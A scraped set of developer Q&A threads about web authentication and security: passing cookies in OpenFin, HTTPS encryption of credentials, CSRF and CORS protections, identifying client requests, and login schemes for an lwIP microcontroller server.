Openfin .netAdapter https - openfin

I am trying build a winform app with openfin that has https authentication requirements.
I was able to bring up the embeddedView URl sites that don't have require login information.
To enable sso/login authentication and authorization,
I have tried passing cookie information as custom request Headers by adding them to the request.
Dictionary headers = Dictionary<object,object>();
and Add cookies and setting the "Set-Cookie" header to headers
I essentially do the following after
_appOptions.MainWindowOptions.CustomRequestHeaders.Add(headers);
subsequently, I initialize EmbeddedView with the following
embeddedView.Initialize(_runtimeOptions,_appOptions)
this however doesn't send any cookies to the app server. Can someone help to confirm if this is the right approach. How may I send cookies/authentication as part of requests for openfin forms/windows?
thanks

Related

Credentials in a request body over Https

Hey so am new to pentesting and I learnt that using https makes the traffic encrypted so hackers cannot decipher credentials passed in a body for example in a login page or read the traffic properly. So I was practicing with both GET and POST requests for a login page app over https and in both the credentials are present in the request body when I intercept them using burpsuite. In GET the params are available in the URL and in POST they are present in the body. Can someone explain then how can the privacy of credentials be maintained if they are present in plaintext in the request body. Won't everyone be able to read them??
Testing:
Submitted credentials through a login page application over Https.
Passed them through both GET and POST methods.
Result:
Able to see creds in both types of calls in the request body.
Burpsuite sees them because it runs as a proxy for the browser. Over HTTPS both GET and POST parameters are encrypted once they leave the browser.
Note that the URL as such doesn’t leave the browser (or, more generally, user agent). A connection is made using the hostname and port (those will still be visible to a man-in-the-middle) but the GET parameters are sent using HTTPS once the connection is established.
The reason people say not to pass sensitive information in GET requests is because the URL may end up in log files, browser history, seen over people’s shoulders, etc. Also GET requests can be cached.

CSRF implementation in a MERN stack

Below is the file structure of my MERN project.
|-Project
|- client
|- server
Client folder contains a react server.
Client runs at localhost.client.com
Server folder contains a code for the node.js server.
Server runs at localhost.server.com
Whenever I'm making a request from the client to server. How can I mitigate the csrf attack?
To make sure that the request made to the server is from the client and not from any other source.
Your issue might be covered in React frontend and REST API, CSRF.
There is an excellent article about CSRF and counter measures (with Angular in mind, but it is still the same problem). TL/DR:
use same-origin-policy or set Access-Control-Allow-Origin-header when needed
save XSRF-Token as secure cookie (unfortunately this requires an exta request - most times). Only code from your domain can access this value.
send that token as X-XSRF-TOKEN header value with your request to authorize the request
To make sure only your application can use the server api you can set the Access-Control-Allow-Origin value in the CORS / OPTIONS response header.
During development it usually is set to
Access-Control-Allow-Origin: *
for production you specify your domain / server name
Access-Control-Allow-Origin: localhost.client.com
To prevent spoofing the origin, you can use (Anti-)CSRF-Tokens. This are extra values attached to your request, which authenticate your request.
This value can/should be saved in a secure cookie. csurf or JSON Web Tokens might be relevant for you. In your case CSRF-Tokens might require an extra request to your api to query the token.

How to distinguish between HTTP requests sent by my client application and other requests from the Internet

Suppose I have an client/server application working over HTTP. The server provides a RESTy API and client calls the server over HTTP using regular HTTP GET requests.
The server requires no authentication. Anyone on the Internet can send a GET HTTP request to my server. It's Ok. I just wonder how I can distinguish between the requests from my client and other requests from the Internet.
Suppose my client sent a request X. A user recorded this request (including the agent, headers, cookies, etc.) and send it again with wget for example. I would like to distinguish between these two requests in the server-side.
There is no exact solution rather then authentication. On the other hand, you do not need to implement username & password authentication for this basic requirement. You could simply identify a random string for your "client" and send it to api over custom http header variable like ;
GET /api/ HTTP/1.1
Host: www.backend.com
My-Custom-Token-Dude: a717sfa618e89a7a7d17dgasad
...
You could distinguish the requests by this custom header variable and it's values existence and validity. But I'm saying "Security through obscurity" is not a solution.
You cannot know for sure if it is your application or not. Anything in the request can be made up.
But, you can make sure that nobody is using your application inadvertently. For example somebody may create a javascript application and point to your REST API. The browser sends the Origin header (draft) indicating in which application was the request generated. You can use this header to filter calls from applications that are not yours.
However, that somebody may use his own web server as proxy to your application, allowing him then to craft HTTP requests with more detail. In this case, at some point you would be able of pin point his IP address and block it.
But the best solution would be to put some degree of authorization. For example, the UI part can ask for authentication via login/password, or just a captcha to ensure the caller is a person, then generate a token and associate that token with the use session. From that point the calls to the API have to provide such token, otherwise you must reject them.

chrome disable web security, why should that be allowed?

as far as i know 'Access-Control-Allow-Origin' is used as part of CORS to limit which all hosts can request data from a given api server. This flag/variable value is set by the server as part of a response.
I did happen to stumble upon this chrome extension which says:
Allow to you request any site with ajax from any source. Add to
response - 'Access-Control-Allow-Origin: *' header
Developer tool.
Summary Add to response header rule - 'Allow-Control-Allow-Origin: *'
Hint Same behavior you can get just using chrome flags [http://www.chromium.org/developers/how-tos/run-chromium-with-flags]
chrome --disable-web-security
or
--allow-file-access-from-files --allow-file-access --allow-cross-origin-auth-prompt
so that means from the client side I can change the response header. So it means that if i set on server : 'Access-Control-Allow-Origin : http://api.example.com' this setting can be overwritten by client 'Access-Control-Allow-Origin : *'. or may be I do not want to support cors - so i dont set it, but this will still show as if I do support CORS.
If that is the case, what is the point in having my server side setting?? isn't that left redundant??
May be I am being too naive here, and not getting the basics of it.
CORS is a security feature to protect clients from CORF, or Cross Origin Request Forgery. It is not intended to secure servers, as a client can simply choose to ignore them.
An example of CORF would be visiting a website, and client-side code on that website interacts with another website on your behalf, do things like submitting data to a website, or reading data that requires authentication as you, all with your active authentication sessions.
Theoretically, without CORS, it would be possible to create a website that will fetch your email from a webmail provider (provided you are logged in at the time), and post it back to a server for malicious individuals to read.
To avoid this, you shouldn't browse the web with such security features disabled. It's available to ease development, not for general browsing.

lwIP on Stellaris 32-bit microcontroller - Secure Login

I wish to use my Stellaris LM3S8962 microcontroller as a bridge between internet and a bunch of sensors. I will be using Zigbee nodes for communication from the sensors to the microcontroller. I have been able to use the lwIP TCP/IP stack (for LM3S8962) to access HTML pages stored in the controller's flash.
Now, I want to add a secure login system for the same. What I basically want is that - when I enter the IP of the controller in the browser, it should prompt me for a username and a password. I want to make this system as secure as possible using the lwIP TCP/IP stack.
FYI, the stack does not support PHP or any other scripts. CGI feature (in C) is supported but I don't know how to implement the security part. Please guide.
There are basically two ways you could implement user authentication over HTTP on your platform:
"classic" Basic HTTP authentication (see RFC2616 for exact specification),
a login form, creating a session ID, and returning that to the browser, to be stored either in a cookie, or in the URL.
Basic HTTP authentication works by you inserting a check into your web page serving routine, to see if there is an Authorization HTTP header. If there is, you should decode it (see the RFC), and check the specified username/password. If the credentials are ok, then proceed with the web page serving. If the credentials are incorrect, or in case there is no Authorization header, you should return a 401 error code. The browser will then prompt the user for the credentials. This solution is rather simple, and you'll get the browser login dialog, not a nice HTML page. Also, the microcontroller will have to check the credentials for every page request.
Authentication via a login form works by your server maintaining a list of properly authenticated user sessions (probably in memory), and checking the request against this list. Upon loggin in, a unique, random ID should be generated for that session, and the session data should be entered into your list. The new session ID should be returned to the browser to be included in upcoming HTTP requests. You may choose the session ID to be put into a browser cookie, or you can embed it into the URL, as a URL parameter (?id=xxxxx). The URL parameter is embedded by sending a 302 Redirection response to the browser with the new URL. If you want the cookie solution, you can send the response to the login request with a Set-Cookie HTTP response header. In the login form solution, the actual credentials (username/password) are only checked once, at login. After that, only the session ID is checked against the list of active sessions. The session ID has to be extracted from the requests for every web page serving (from the URL, or from the Cookie HTTP header). Also, you'll have to implement some kind of session timeout, both as a security measure, and to put bounds to the size of the list of active sessions.
Now comes the harder part: in both solutions, the username/password travels in some requests (in every request for the Basic HTTP authentication, and in the login page POST for the login form solution), and can be extracted from the network traffic. Also, information neccessary to hijack the session is present in every request in both solutions. If this is a problem (the system works on a freely accessible LAN segment, or over network links beyond your control), you'll probably need SSL to hide these sensitive data. How to get a reasonable SSL implementation for your platform, that's another question.

Resources